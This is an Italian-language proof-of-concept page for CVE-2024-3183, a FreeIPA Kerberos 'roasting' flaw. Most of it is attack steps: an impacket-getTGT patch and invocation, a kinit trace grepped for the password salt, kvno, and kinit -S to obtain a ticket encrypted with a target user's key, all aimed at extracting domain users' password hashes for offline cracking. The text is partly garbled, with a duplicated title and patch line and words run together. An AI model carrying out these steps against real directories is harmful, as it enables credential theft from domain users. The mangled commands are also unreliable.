
PoC per CVE-2024-3183 (FreeIPA Rosting)
POC per CVE-2024-3183 (FreeIPA Rosting)
Impatto: Un utente con privilegi bassi può ottenere un hash delle password di tutti gli utenti del dominio ed eseguire un brute force offline (kerberoasting).
Patch per impacket-getTGT:
decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.-service e -debug per ottenere il salt in un unico comando.
impacket-getTGT test.local/user -debug -service adminkinit user

printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS, 2 - SALT, 3 - Password.
kinit -S target usere ottieni un TGT cifrato con la chiave dell'utente target.